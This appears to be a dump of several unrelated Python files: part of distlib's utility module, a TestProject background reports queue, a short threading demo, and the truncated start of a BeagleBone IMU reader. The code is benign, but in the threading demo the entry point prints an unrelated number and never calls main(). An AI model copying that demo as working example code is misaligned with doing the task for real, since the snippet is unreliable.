""" self.ensure_dir(os.path.dirname(outfile)) logger.info('Copying %s to %s', infile, outfile) if not self.dry_run: msg = None if check: if os.path.islink(outfile): msg = '%s is a symlink' % outfile elif os.path.exists(outfile) and not os.path.isfile(outfile): msg = '%s is a non-regular file' % outfile if msg: raise ValueError(msg + ' which would be overwritten') shutil.copyfile(infile, outfile) self.record_as_written(outfile) def copy_stream(self, instream, outfile, encoding=None): assert not os.path.isdir(outfile) self.ensure_dir(os.path.dirname(outfile)) logger.info('Copying stream %s to %s', instream, outfile) if not self.dry_run: if encoding is None: outstream = open(outfile, 'wb') else: outstream = codecs.open(outfile, 'w', encoding=encoding) try: shutil.copyfileobj(instream, outstream) finally: outstream.close() self.record_as_written(outfile) def write_binary_file(self, path, data): self.ensure_dir(os.path.dirname(path)) if not self.dry_run: with open(path, 'wb') as f: f.write(data) self.record_as_written(path) def write_text_file(self, path, data, encoding): self.ensure_dir(os.path.dirname(path)) if not self.dry_run: with open(path, 'wb') as f: f.write(data.encode(encoding)) self.record_as_written(path) def set_mode(self, bits, mask, files): if os.name == 'posix': # Set the executable bits (owner, group, and world) on # all the files specified. 
for f in files: if self.dry_run: logger.info("changing mode of %s", f) else: mode = (os.stat(f).st_mode | bits) & mask logger.info("changing mode of %s to %o", f, mode) os.chmod(f, mode) set_executable_mode = lambda s, f: s.set_mode(0o555, 0o7777, f) def ensure_dir(self, path): path = os.path.abspath(path) if path not in self.ensured and not os.path.exists(path): self.ensured.add(path) d, f = os.path.split(path) self.ensure_dir(d) logger.info('Creating %s' % path) if not self.dry_run: os.mkdir(path) if self.record: self.dirs_created.add(path) def byte_compile(self, path, optimize=False, force=False, prefix=None): dpath = cache_from_source(path, not optimize) logger.info('Byte-compiling %s to %s', path, dpath) if not self.dry_run: if force or self.newer(path, dpath): if not prefix: diagpath = None else: assert path.startswith(prefix) diagpath = path[len(prefix):] py_compile.compile(path, dpath, diagpath, True) # raise error self.record_as_written(dpath) return dpath def ensure_removed(self, path): if os.path.exists(path): if os.path.isdir(path) and not os.path.islink(path): logger.debug('Removing directory tree at %s', path) if not self.dry_run: shutil.rmtree(path) if self.record: if path in self.dirs_created: self.dirs_created.remove(path) else: if os.path.islink(path): s = 'link' else: s = 'file' logger.debug('Removing %s %s', s, path) if not self.dry_run: os.remove(path) if self.record: if path in self.files_written: self.files_written.remove(path) def is_writable(self, path): result = False while not result: if os.path.exists(path): result = os.access(path, os.W_OK) break parent = os.path.dirname(path) if parent == path: break path = parent return result def commit(self): """ Commit recorded changes, turn off recording, return changes. 
""" assert self.record result = self.files_written, self.dirs_created self._init_record() return result def rollback(self): if not self.dry_run: for f in list(self.files_written): if os.path.exists(f): os.remove(f) # dirs should all be empty now, except perhaps for # __pycache__ subdirs # reverse so that subdirs appear before their parents dirs = sorted(self.dirs_created, reverse=True) for d in dirs: flist = os.listdir(d) if flist: assert flist == ['__pycache__'] sd = os.path.join(d, flist[0]) os.rmdir(sd) os.rmdir(d) # should fail if non-empty self._init_record() def resolve(module_name, dotted_path): if module_name in sys.modules: mod = sys.modules[module_name] else: mod = __import__(module_name) if dotted_path is None: result = mod else: parts = dotted_path.split('.') result = getattr(mod, parts.pop(0)) for p in parts: result = getattr(result, p) return result class ExportEntry(object): def __init__(self, name, prefix, suffix, flags): self.name = name self.prefix = prefix self.suffix = suffix self.flags = flags @cached_property def value(self): return resolve(self.prefix, self.suffix) def __repr__(self): return '<ExportEntry %s = %s:%s %s>' % (self.name, self.prefix, self.suffix, self.flags) def __eq__(self, other): if not isinstance(other, ExportEntry): result = False else: result = (self.name == other.name and self.prefix == other.prefix and self.suffix == other.suffix and self.flags == other.flags) return result __hash__ = object.__hash__ ENTRY_RE = re.compile(r'''(?P<name>(\w|[-.])+) \s*=\s*(?P<callable>(\w+)([:\.]\w+)*) \s*(\[\s*(?P<flags>\w+(=\w+)?(,\s*\w+(=\w+)?)*)\s*\])? 
''', re.VERBOSE) def get_export_entry(specification): m = ENTRY_RE.search(specification) if not m: result = None if '[' in specification or ']' in specification: raise DistlibException('Invalid specification ' '%r' % specification) else: d = m.groupdict() name = d['name'] path = d['callable'] colons = path.count(':') if colons == 0: prefix, suffix = path, None else: if colons != 1: raise DistlibException('Invalid specification ' '%r' % specification) prefix, suffix = path.split(':') flags = d['flags'] if flags is None: if '[' in specification or ']' in specification: raise DistlibException('Invalid specification ' '%r' % specification) flags = [] else: flags = [f.strip() for f in flags.split(',')] result = ExportEntry(name, prefix, suffix, flags) return result def get_cache_base(suffix=None): """ Return the default base location for distlib caches. If the directory does not exist, it is created. Use the suffix provided for the base directory, and default to '.distlib' if it isn't provided. On Windows, if LOCALAPPDATA is defined in the environment, then it is assumed to be a directory, and will be the parent directory of the result. On POSIX, and on Windows if LOCALAPPDATA is not defined, the user's home directory - using os.expanduser('~') - will be the parent directory of the result. The result is just the directory '.distlib' in the parent directory as determined above, or with the name specified with ``suffix``. 
""" if suffix is None: suffix = '.distlib' if os.name == 'nt' and 'LOCALAPPDATA' in os.environ: result = os.path.expandvars('$localappdata') else: # Assume posix, or old Windows result = os.path.expanduser('~') # we use 'isdir' instead of 'exists', because we want to # fail if there's a file with that name if os.path.isdir(result): usable = os.access(result, os.W_OK) if not usable: logger.warning('Directory exists but is not writable: %s', result) else: try: os.makedirs(result) usable = True except OSError: logger.warning('Unable to create %s', result, exc_info=True) usable = False if not usable: result = tempfile.mkdtemp() logger.warning('Default location unusable, using %s', result) return os.path.join(result, suffix) def path_to_cache_dir(path): """ Convert an absolute path to a directory name for use in a cache. The algorithm used is: #. On Windows, any ``':'`` in the drive is replaced with ``'---'``. #. Any occurrence of ``os.sep`` is replaced with ``'--'``. #. ``'.cache'`` is appended. 
""" d, p = os.path.splitdrive(os.path.abspath(path)) if d: d = d.replace(':', '---') p = p.replace(os.sep, '--') return d + p + '.cache' def ensure_slash(s): if not s.endswith('/'): return s + '/' return s def parse_credentials(netloc): username = password = None if '@' in netloc: prefix, netloc = netloc.split('@', 1) if ':' not in prefix: username = prefix else: username, password = prefix.split(':', 1) return username, password, netloc def get_process_umask(): result = os.umask(0o22) os.umask(result) return result def is_string_sequence(seq): result = True i = None for i, s in enumerate(seq): if not isinstance(s, string_types): result = False break assert i is not None return result PROJECT_NAME_AND_VERSION = re.compile('([a-z0-9_]+([.-][a-z_][a-z0-9_]*)*)-' '([a-z0-9_.+-]+)', re.I) PYTHON_VERSION = re.compile(r'-py(\d\.?\d?)') def split_filename(filename, project_name=None): """ Extract name, version, python version from a filename (no extension) Return name, version, pyver or None """ result = None pyver = None m = PYTHON_VERSION.search(filename) if m: pyver = m.group(1) filename = filename[:m.start()] if project_name and len(filename) > len(project_name) + 1: m = re.match(re.escape(project_name) + r'\b', filename) if m: n = m.end() result = filename[:n], filename[n + 1:], pyver if result is None: m = PROJECT_NAME_AND_VERSION.match(filename) if m: result = m.group(1), m.group(3), pyver return result # Allow spaces in name because of legacy dists like "Twisted Core" NAME_VERSION_RE = re.compile(r'(?P<name>[\w .-]+)\s*' r'\(\s*(?P<ver>[^\s)]+)\)$') def parse_name_and_version(p): """ A utility method used to get name and version from a string. From e.g. a Provides-Dist value. :param p: A value in a form 'foo (1.0)' :return: The name and version as a tuple. 
""" m = NAME_VERSION_RE.match(p) if not m: raise DistlibException('Ill-formed name/version string: \'%s\'' % p) d = m.groupdict() return d['name'].strip().lower(), d['ver'] def get_extras(requested, available): result = set() requested = set(requested or []) available = set(available or []) if '*' in requested: requested.remove('*') result |= available for r in requested: if r == '-': result.add(r) elif r.startswith('-'): unwanted = r[1:] if unwanted not in available: logger.warning('undeclared extra: %s' % unwanted) if unwanted in result: result.remove(unwanted) else: if r not in available: logger.warning('undeclared extra: %s' % r) result.add(r) return result # # Extended metadata functionality # def _get_external_data(url): result = {} try: # urlopen might fail if it runs into redirections, # because of Python issue #13696. Fixed in locators # using a custom redirect handler. resp = urlopen(url) headers = resp.info() if headers.get('Content-Type') != 'application/json': logger.debug('Unexpected response for JSON request') else: reader = codecs.getreader('utf-8')(resp) # data = reader.read().decode('utf-8') #result = json.loads(data) result = json.load(reader) except Exception as e: logger.exception('Failed to get external data for %s: %s', url, e) return result def get_project_data(name): url = ('https://www.red-dove.com/pypi/projects/' '%s/%s/project.json' % (name[0].upper(), name)) result = _get_external_data(url) return result def get_package_data(name, version): url = ('https://www.red-dove.com/pypi/projects/' '%s/%s/package-%s.json' % (name[0].upper(), name, version)) return _get_external_data(url) class Cache(object): """ A class implementing a cache for resources that need to live in the file system e.g. shared libraries. This class was moved from resources to here because it could be used by other modules, e.g. the wheel module. """ def __init__(self, base): """ Initialise an instance. :param base: The base directory where the cache should be located. 
""" # we use 'isdir' instead of 'exists', because we want to # fail if there's a file with that name if not os.path.isdir(base): os.makedirs(base) if (os.stat(base).st_mode & 0o77) != 0: logger.warning('Directory \'%s\' is not private', base) self.base = os.path.abspath(os.path.normpath(base)) def prefix_to_dir(self, prefix): """ Converts a resource prefix to a directory name in the cache. """ return path_to_cache_dir(prefix) def clear(self): """ Clear the cache. """ not_removed = [] for fn in os.listdir(self.base): fn = os.path.join(self.base, fn) try: if os.path.islink(fn) or os.path.isfile(fn): os.remove(fn) elif os.path.isdir(fn): shutil.rmtree(fn) except Exception: not_removed.append(fn) return not_removed class EventMixin(object): """ A very simple publish/subscribe system. """ def __init__(self): self._subscribers = {} def add(self, event, subscriber, append=True): """ Add a subscriber for an event. :param event: The name of an event. :param subscriber: The subscriber to be added (and called when the event is published). :param append: Whether to append or prepend the subscriber to an existing subscriber list for the event. """ subs = self._subscribers if event not in subs: subs[event] = deque([subscriber]) else: sq = subs[event] if append: sq.append(subscriber) else: sq.appendleft(subscriber) def remove(self, event, subscriber): """ Remove a subscriber for an event. :param event: The name of an event. :param subscriber: The subscriber to be removed. """ subs = self._subscribers if event not in subs: raise ValueError('No subscribers: %r' % event) subs[event].remove(subscriber) def get_subscribers(self, event): """ Return an iterator for the subscribers for an event. :param event: The event to return subscribers for. """ return iter(self._subscribers.get(event, ())) def publish(self, event, *args, **kwargs): """ Publish a event and return a list of values returned by its subscribers. :param event: The event to publish. 
:param args: The positional arguments to pass to the event's subscribers. :param kwargs: The keyword arguments to pass to the event's subscribers. """ result = [] for subscriber in self.get_subscribers(event): try: value = subscriber(event, *args, **kwargs) except Exception: logger.exception('Exception during event publication') value = None result.append(value) logger.debug('publish %s: args = %s, kwargs = %s, result = %s', event, args, kwargs, result) return result # # Simple sequencing # class Sequencer(object): def __init__(self): self._preds = {} self._succs = {} self._nodes = set() # nodes with no preds/succs def add_node(self, node): self._nodes.add(node) def remove_node(self, node, edges=False): if node in self._nodes: self._nodes.remove(node) if edges: for p in set(self._preds.get(node, ())): self.remove(p, node) for s in set(self._succs.get(node, ())): self.remove(node, s) # Remove empties for k, v in list(self._preds.items()): if not v: del self._preds[k] for k, v in list(self._succs.items()): if not v: del self._succs[k] def add(self, pred, succ): assert pred != succ self._preds.setdefault(succ, set()).add(pred) self._succs.setdefault(pred, set()).add(succ) def remove(self, pred, succ): assert pred != succ try: preds = self._preds[succ] succs = self._succs[pred] except KeyError: raise ValueError('%r not a successor of anything' % succ) try: preds.remove(pred) succs.remove(succ) except KeyError: raise ValueError('%r not a successor of %r' % (succ, pred)) def is_step(self, step): return (step in self._preds or step in self._succs or step in self._nodes) def get_steps(self, final): if not self.is_step(final): raise ValueError('Unknown: %r' % final) result = [] todo = [] seen = set() todo.append(final) while todo: step = todo.pop(0) if step in seen: # if a step was already seen, # move it to the end (so it will appear earlier # when reversed on return) ... 
but not for the # final step, as that would be confusing for # users if step != final: result.remove(step) result.append(step) else: seen.add(step) result.append(step) preds = self._preds.get(step, ()) todo.extend(preds) return reversed(result) @property def strong_connections(self): # http://en.wikipedia.org/wiki/Tarjan%27s_strongly_connected_components_algorithm index_counter = [0] stack = [] lowlinks = {} index = {} result = [] graph = self._succs def strongconnect(node): # set the depth index for this node to the smallest unused index index[node] = index_counter[0] lowlinks[node] = index_counter[0] index_counter[0] += 1 stack.append(node) # Consider successors try: successors = graph[node] except Exception: successors = [] for successor in successors: if successor not in lowlinks: # Successor has not yet been visited strongconnect(successor) lowlinks[node] = min(lowlinks[node], lowlinks[successor]) elif successor in stack: # the successor is in the stack and hence in the current # strongly connected component (SCC) lowlinks[node] = min(lowlinks[node], index[successor]) # If `node` is a root node, pop the stack and generate an SCC if lowlinks[node] == index[node]: connected_component = [] while True: successor = stack.pop() connected_component.append(successor) if successor == node: break component = tuple(connected_component) # storing the result result.append(component) for node in graph: if node not in lowlinks: strongconnect(node) return result @property def dot(self): result = ['digraph G {'] for succ in self._preds: preds = self._preds[succ] for pred in preds: result.append(' %s -> %s;' % (pred, succ)) for node in self._nodes: result.append(' %s;' % node) result.append('}') return '\n'.join(result) # # Unarchiving functionality for zip, tar, tgz, tbz, whl # ARCHIVE_EXTENSIONS = ('.tar.gz', '.tar.bz2', '.tar', '.zip', '.tgz', '.tbz', '.whl') def unarchive(archive_filename, dest_dir, format=None, check=True): def check_path(path): if not isinstance(path, 
text_type): path = path.decode('utf-8') p = os.path.abspath(os.path.join(dest_dir, path)) if not p.startswith(dest_dir) or p[plen] != os.sep: raise ValueError('path outside destination: %r' % p) dest_dir = os.path.abspath(dest_dir) plen = len(dest_dir) archive = None if format is None: if archive_filename.endswith(('.zip', '.whl')): format = 'zip' elif archive_filename.endswith(('.tar.gz', '.tgz')): format = 'tgz' mode = 'r:gz' elif archive_filename.endswith(('.tar.bz2', '.tbz')): format = 'tbz' mode = 'r:bz2' elif archive_filename.endswith('.tar'): format = 'tar' mode = 'r' else: raise ValueError('Unknown format for %r' % archive_filename) try: if format == 'zip': archive = ZipFile(archive_filename, 'r') if check: names = archive.namelist() for name in names: check_path(name) else: archive = tarfile.open(archive_filename, mode) if check: names = archive.getnames() for name in names: check_path(name) if format != 'zip' and sys.version_info[0] < 3: # See Python issue 17153. If the dest path contains Unicode, # tarfile extraction fails on Python 2.x if a member path name # contains non-ASCII characters - it leads to an implicit # bytes -> unicode conversion using ASCII to decode. 
for tarinfo in archive.getmembers(): if not isinstance(tarinfo.name, text_type): tarinfo.name = tarinfo.name.decode('utf-8') archive.extractall(dest_dir) finally: if archive: archive.close() def zip_dir(directory): """zip a directory tree into a BytesIO object""" result = io.BytesIO() dlen = len(directory) with ZipFile(result, "w") as zf: for root, dirs, files in os.walk(directory): for name in files: full = os.path.join(root, name) rel = root[dlen:] dest = os.path.join(rel, name) zf.write(full, dest) return result # # Simple progress bar # UNITS = ('', 'K', 'M', 'G', 'T', 'P') class Progress(object): unknown = 'UNKNOWN' def __init__(self, minval=0, maxval=100): assert maxval is None or maxval >= minval self.min = self.cur = minval self.max = maxval self.started = None self.elapsed = 0 self.done = False def update(self, curval): assert self.min <= curval assert self.max is None or curval <= self.max self.cur = curval now = time.time() if self.started is None: self.started = now else: self.elapsed = now - self.started def increment(self, incr): assert incr >= 0 self.update(self.cur + incr) def start(self): self.update(self.min) return self def stop(self): if self.max is not None: self.update(self.max) self.done = True @property def maximum(self): return self.unknown if self.max is None else self.max @property def percentage(self): if self.done: result = '100 %' elif self.max is None: result = ' ?? %' else: v = 100.0 * (self.cur - self.min) / (self.max - self.min) result = '%3d %%' % v return result def format_duration(self, duration): if (duration <= 0) and self.max is None or self.cur == self.min: result = '??:??:??' 
# elif duration < 1: # result = '--:--:--' else: result = time.strftime('%H:%M:%S', time.gmtime(duration)) return result @property def ETA(self): if self.done: prefix = 'Done' t = self.elapsed # import pdb; pdb.set_trace() else: prefix = 'ETA ' if self.max is None: t = -1 elif self.elapsed == 0 or (self.cur == self.min): t = 0 else: # import pdb; pdb.set_trace() t = float(self.max - self.min) t /= self.cur - self.min t = (t - 1) * self.elapsed return '%s: %s' % (prefix, self.format_duration(t)) @property def speed(self): if self.elapsed == 0: result = 0.0 else: result = (self.cur - self.min) / self.elapsed for unit in UNITS: if result < 1000: break result /= 1000.0 return '%d %sB/s' % (result, unit) # # Glob functionality # RICH_GLOB = re.compile(r'\{([^}]*)\}') _CHECK_RECURSIVE_GLOB = re.compile(r'[^/\\,{]\*\*|\*\*[^/\\,}]') _CHECK_MISMATCH_SET = re.compile(r'^[^{]*\}|\{[^}]*$') def iglob(path_glob): """Extended globbing function that supports ** and {opt1,opt2,opt3}.""" if _CHECK_RECURSIVE_GLOB.search(path_glob): msg = """invalid glob %r: recursive glob "**" must be used alone""" raise ValueError(msg % path_glob) if _CHECK_MISMATCH_SET.search(path_glob): msg = """invalid glob %r: mismatching set marker '{' or '}'""" raise ValueError(msg % path_glob) return _iglob(path_glob) def _iglob(path_glob): rich_path_glob = RICH_GLOB.split(path_glob, 1) if len(rich_path_glob) > 1: assert len(rich_path_glob) == 3, rich_path_glob prefix, set, suffix = rich_path_glob for item in set.split(','): for path in _iglob(''.join((prefix, item, suffix))): yield path else: if '**' not in path_glob: for item in std_iglob(path_glob): yield item else: prefix, radical = path_glob.split('**', 1) if prefix == '': prefix = '.' 
if radical == '': radical = '*' else: # we support both radical = radical.lstrip('/') radical = radical.lstrip('\\') for path, dir, files in os.walk(prefix): path = os.path.normpath(path) for fn in _iglob(os.path.join(path, radical)): yield fn # # HTTPSConnection which verifies certificates/matches domains # class HTTPSConnection(httplib.HTTPSConnection): ca_certs = None # set this to the path to the certs file (.pem) check_domain = True # only used if ca_certs is not None # noinspection PyPropertyAccess def connect(self): sock = socket.create_connection((self.host, self.port), self.timeout) if getattr(self, '_tunnel_host', False): self.sock = sock self._tunnel() if not hasattr(ssl, 'SSLContext'): # For 2.x if self.ca_certs: cert_reqs = ssl.CERT_REQUIRED else: cert_reqs = ssl.CERT_NONE self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file, cert_reqs=cert_reqs, ssl_version=ssl.PROTOCOL_SSLv23, ca_certs=self.ca_certs) else: context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) context.options |= ssl.OP_NO_SSLv2 if self.cert_file: context.load_cert_chain(self.cert_file, self.key_file) kwargs = {} if self.ca_certs: context.verify_mode = ssl.CERT_REQUIRED context.load_verify_locations(cafile=self.ca_certs) if getattr(ssl, 'HAS_SNI', False): kwargs['server_hostname'] = self.host self.sock = context.wrap_socket(sock, **kwargs) if self.ca_certs and self.check_domain: try: match_hostname(self.sock.getpeercert(), self.host) logger.debug('Host verified: %s', self.host) except CertificateError: self.sock.shutdown(socket.SHUT_RDWR) self.sock.close() raise class HTTPSHandler(BaseHTTPSHandler): def __init__(self, ca_certs, check_domain=True): BaseHTTPSHandler.__init__(self) self.ca_certs = ca_certs self.check_domain = check_domain def _conn_maker(self, *args, **kwargs): """ This is called to create a connection instance. Normally you'd pass a connection class to do_open, but it doesn't actually check for a class, and just expects a callable. 
As long as we behave just as a constructor would have, we should be OK. If it ever changes so that we *must* pass a class, we'll create an UnsafeHTTPSConnection class which just sets check_domain to False in the class definition, and choose which one to pass to do_open. """ result = HTTPSConnection(*args, **kwargs) if self.ca_certs: result.ca_certs = self.ca_certs result.check_domain = self.check_domain return result def https_open(self, req): try: return self.do_open(self._conn_maker, req) except URLError as e: if 'certificate verify failed' in str(e.reason): raise CertificateError('Unable to verify server certificate ' 'for %s' % req.host) else: raise # # To prevent against mixing HTTP traffic with HTTPS (examples: A Man-In-The- # Middle proxy using HTTP listens on port 443, or an index mistakenly serves # HTML containing a http://xyz link when it should be https://xyz), # you can use the following handler class, which does not allow HTTP traffic. # # It works by inheriting from HTTPHandler - so build_opener won't add a # handler for HTTP itself. 
# class HTTPSOnlyHandler(HTTPSHandler, HTTPHandler): def http_open(self, req): raise URLError('Unexpected HTTP request on what should be a secure ' 'connection: %s' % req) # # XML-RPC with timeouts # _ver_info = sys.version_info[:2] if _ver_info == (2, 6): class HTTP(httplib.HTTP): def __init__(self, host='', port=None, **kwargs): if port == 0: # 0 means use port 0, not the default port port = None self._setup(self._connection_class(host, port, **kwargs)) class HTTPS(httplib.HTTPS): def __init__(self, host='', port=None, **kwargs): if port == 0: # 0 means use port 0, not the default port port = None self._setup(self._connection_class(host, port, **kwargs)) class Transport(xmlrpclib.Transport): def __init__(self, timeout, use_datetime=0): self.timeout = timeout xmlrpclib.Transport.__init__(self, use_datetime) def make_connection(self, host): h, eh, x509 = self.get_host_info(host) if _ver_info == (2, 6): result = HTTP(h, timeout=self.timeout) else: if not self._connection or host != self._connection[0]: self._extra_headers = eh self._connection = host, httplib.HTTPConnection(h) result = self._connection[1] return result class SafeTransport(xmlrpclib.SafeTransport): def __init__(self, timeout, use_datetime=0): self.timeout = timeout xmlrpclib.SafeTransport.__init__(self, use_datetime) def make_connection(self, host): h, eh, kwargs = self.get_host_info(host) if not kwargs: kwargs = {} kwargs['timeout'] = self.timeout if _ver_info == (2, 6): result = HTTPS(host, None, **kwargs) else: if not self._connection or host != self._connection[0]: self._extra_headers = eh self._connection = host, httplib.HTTPSConnection(h, None, **kwargs) result = self._connection[1] return result class ServerProxy(xmlrpclib.ServerProxy): def __init__(self, uri, **kwargs): self.timeout = timeout = kwargs.pop('timeout', None) # The above classes only come into play if a timeout # is specified if timeout is not None: scheme, _ = splittype(uri) use_datetime = kwargs.get('use_datetime', 0) if scheme 
== 'https': tcls = SafeTransport else: tcls = Transport kwargs['transport'] = t = tcls(timeout, use_datetime=use_datetime) self.transport = t xmlrpclib.ServerProxy.__init__(self, uri, **kwargs) # # CSV functionality. This is provided because on 2.x, the csv module can't # handle Unicode. However, we need to deal with Unicode in e.g. RECORD files. # def _csv_open(fn, mode, **kwargs): if sys.version_info[0] < 3: mode += 'b' else: kwargs['newline'] = '' return open(fn, mode, **kwargs) class CSVBase(object): defaults = { 'delimiter': str(','), # The strs are used because we need native 'quotechar': str('"'), # str in the csv API (2.x won't take 'lineterminator': str('\n') # Unicode) } def __enter__(self): return self def __exit__(self, *exc_info): self.stream.close() class CSVReader(CSVBase): def __init__(self, **kwargs): if 'stream' in kwargs: stream = kwargs['stream'] if sys.version_info[0] >= 3: # needs to be a text stream stream = codecs.getreader('utf-8')(stream) self.stream = stream else: self.stream = _csv_open(kwargs['path'], 'r') self.reader = csv.reader(self.stream, **self.defaults) def __iter__(self): return self def next(self): result = next(self.reader) if sys.version_info[0] < 3: for i, item in enumerate(result): if not isinstance(item, text_type): result[i] = item.decode('utf-8') return result __next__ = next class CSVWriter(CSVBase): def __init__(self, fn, **kwargs): self.stream = _csv_open(fn, 'w') self.writer = csv.writer(self.stream, **self.defaults) def writerow(self, row): if sys.version_info[0] < 3: r = [] for item in row: if isinstance(item, text_type): item = item.encode('utf-8') r.append(item) row = r self.writer.writerow(row) # # Configurator functionality # class Configurator(BaseConfigurator): value_converters = dict(BaseConfigurator.value_converters) value_converters['inc'] = 'inc_convert' def __init__(self, config, base=None): super(Configurator, self).__init__(config) self.base = base or os.getcwd() def configure_custom(self, config): def 
convert(o): if isinstance(o, (list, tuple)): result = type(o)([convert(i) for i in o]) elif isinstance(o, dict): if '()' in o: result = self.configure_custom(o) else: result = {} for k in o: result[k] = convert(o[k]) else: result = self.convert(o) return result c = config.pop('()') if not callable(c): c = self.resolve(c) props = config.pop('.', None) # Check for valid identifiers args = config.pop('[]', ()) if args: args = tuple([convert(o) for o in args]) items = [(k, convert(config[k])) for k in config if valid_ident(k)] kwargs = dict(items) result = c(*args, **kwargs) if props: for n, v in props.items(): setattr(result, n, convert(v)) return result def __getitem__(self, key): result = self.config[key] if isinstance(result, dict) and '()' in result: self.config[key] = result = self.configure_custom(result) return result def inc_convert(self, value): """Default converter for the inc:// protocol.""" if not os.path.isabs(value): value = os.path.join(self.base, value) with codecs.open(value, 'r', encoding='utf-8') as f: result = json.load(f) return result # # Mixin for running subprocesses and capturing their output # class SubprocessMixin(object): def __init__(self, verbose=False, progress=None): self.verbose = verbose self.progress = progress def reader(self, stream, context): """ Read lines from a subprocess' output stream and either pass to a progress callable (if specified) or write progress information to sys.stderr. 
""" progress = self.progress verbose = self.verbose while True: s = stream.readline() if not s: break if progress is not None: progress(s, context) else: if not verbose: sys.stderr.write('.') else: sys.stderr.write(s.decode('utf-8')) sys.stderr.flush() stream.close() def run_command(self, cmd, **kwargs): p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, **kwargs) t1 = threading.Thread(target=self.reader, args=(p.stdout, 'stdout')) t1.start() t2 = threading.Thread(target=self.reader, args=(p.stderr, 'stderr')) t2.start() p.wait() t1.join() t2.join() if self.progress is not None: self.progress('done.', 'main') elif self.verbose: sys.stderr.write('done.\n') return p
reports_queue.py
# Copyright 2021 TestProject (https://testproject.io)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import queue
import threading
import logging

from src.testproject.tcp import SocketManager
from typing import Optional

import requests
from requests import HTTPError


class ReportsQueue:
    """Background queue that asynchronously POSTs report payloads to the Agent.

    A daemon worker thread drains the queue; stop() signals the worker and
    waits (bounded) for the remaining items to be flushed.
    """

    # Maximum time (seconds) stop() waits for the worker to drain the queue.
    REPORTS_QUEUE_TIMEOUT = 10

    def __init__(self, token: str):
        self._token = token
        self._close_socket = False
        # Running after all is initialized successfully
        self._running = True
        # After session started and is running, start the reporting thread
        self._queue = queue.Queue()
        self._reporting_thread = threading.Thread(target=self._report_worker, daemon=True)
        self._reporting_thread.start()

    def submit(self, report_as_json: dict, url: str, block: bool):
        """Enqueue a report payload to be POSTed to `url` by the worker.

        Args:
            report_as_json: JSON-serializable payload to report.
            url: Agent endpoint the payload should be POSTed to.
            block: whether the queue put should block if the queue is full.

        Note: annotations fixed — `[dict]`/`[str]`/`[bool]` were list
        literals, not types.
        """
        queue_item = QueueItem(
            report_as_json=report_as_json,
            url=url,
            token=self._token,
        )
        self._queue.put(queue_item, block=block)

    def stop(self):
        """Send all remaining report items in the queue to TestProject."""
        # Send a stop signal to the thread worker
        self._running = False

        # Send a final, empty, report to the queue to ensure that
        # the 'running' condition is evaluated one last time
        self._queue.put(QueueItem(report_as_json=None, url=None, token=self._token), block=False)

        # Wait until all items have been reported or timeout passes
        self._reporting_thread.join(timeout=self.REPORTS_QUEUE_TIMEOUT)

        if self._reporting_thread.is_alive():
            # Thread is still alive, so there are unreported items
            logging.warning(f"There are {self._queue.qsize()} unreported items in the queue")

    def _report_worker(self):
        """Worker method that is polling the queue for items to report."""
        while self._running or self._queue.qsize() > 0:
            # Blocking get; stop() pushes a sentinel QueueItem so this
            # wakes up at least once after _running flips to False.
            item = self._queue.get()
            if isinstance(item, QueueItem):
                self._handle_report(item)
            else:
                logging.warning(f"Unknown object of type {type(item)} found on queue, ignoring it..")
            self._queue.task_done()
        # Close socket only after agent_client is no longer running and all reports in the queue have been sent.
        if self._close_socket:
            SocketManager.instance().close_socket()

    def _handle_report(self, item: "QueueItem"):
        """Send a single queue item to the Agent."""
        item.send()


class QueueItem:
    """Helper class representing an item to be reported

    Args:
        report_as_json (dict): JSON payload representing the item to be reported
        url (str): Agent endpoint the payload should be POSTed to
        token (str): Token used to authenticate with the Agent

    Attributes:
        _report_as_json (Optional[dict]): JSON payload representing the item to be reported
        _url (Optional[str]): Agent endpoint the payload should be POSTed to
        _token (str): Token used to authenticate with the Agent
    """

    def __init__(self, report_as_json: Optional[dict], url: Optional[str], token: str):
        self._report_as_json = report_as_json
        self._url = url
        self._token = token

    def send(self):
        """Send a report item to the Agent, retrying a bounded number of times."""
        max_report_failure_attempts = 4
        if self._report_as_json is None and self._url is None:
            # Skip empty queue items put in the queue on stop()
            return
        for i in range(max_report_failure_attempts):
            with requests.Session() as session:
                response = session.post(
                    self._url,
                    headers={"Authorization": self._token},
                    json=self._report_as_json,
                )
                try:
                    response.raise_for_status()
                    return
                except HTTPError:
                    remaining_attempts = max_report_failure_attempts - i - 1
                    logging.warning(
                        f"Agent responded with an unexpected status {response.status_code}, "
                        f"response from Agent: {response.text}"
                    )
                    logging.info(f"Failed to send a report to the Agent, {remaining_attempts} attempts remaining...")
        # Only reached when every attempt raised HTTPError.
        logging.error(f"All {max_report_failure_attempts} attempts to send report have failed.")

    @property
    def report_as_json(self):
        return self._report_as_json
thr_1.py
import threading
import time


def thread_job():
    """Long-running worker: announces itself, idles ~2 seconds, then exits."""
    print('T1 start\n')
    for _ in range(10):
        time.sleep(0.2)
    print('T1 end\n')


def thread_job2():
    """Short-lived worker that only logs its start and end."""
    print('T2 start\n')
    print('T2 end\n')


def main():
    """Run both workers concurrently, report the thread count, and wait."""
    worker_slow = threading.Thread(target=thread_job, name='T1')
    worker_fast = threading.Thread(target=thread_job2, name='T2')
    workers = (worker_slow, worker_fast)
    for worker in workers:
        worker.start()
    # Counts the main thread plus whichever workers are still alive.
    print(threading.active_count())
    for worker in workers:
        worker.join()
    print('All done\n')


if __name__ == '__main__':
    print(len(str(499999999666666667166666666000000000)))
read10axis.py
import beagle as bg
import argparse
import sys
import time
import csv
import threading
import socket
import pickle
from glob import glob


class Beagle(object):
    """Reads IMU data from a BeagleBone and streams it to disk and/or a TCP peer.

    Args:
        axis_10: when True, additionally sample temperature and magnetometer
            (10-axis mode); otherwise only accelerometer + gyroscope.
    """

    def __init__(self, axis_10):
        self._axis_10 = axis_10
        self._mpu = bg.MPU()
        self.__load_config()

    def __load_config(self):
        """Load the remote endpoint (ip, port) and label from 'config.sock'.

        One value per line; the trailing newline is stripped from each.
        Raises IndexError if the config file does not exist.
        """
        config = glob('config.sock')[0]
        with open(config, 'r') as f:
            self._ip_addr = f.readline()[:-1]
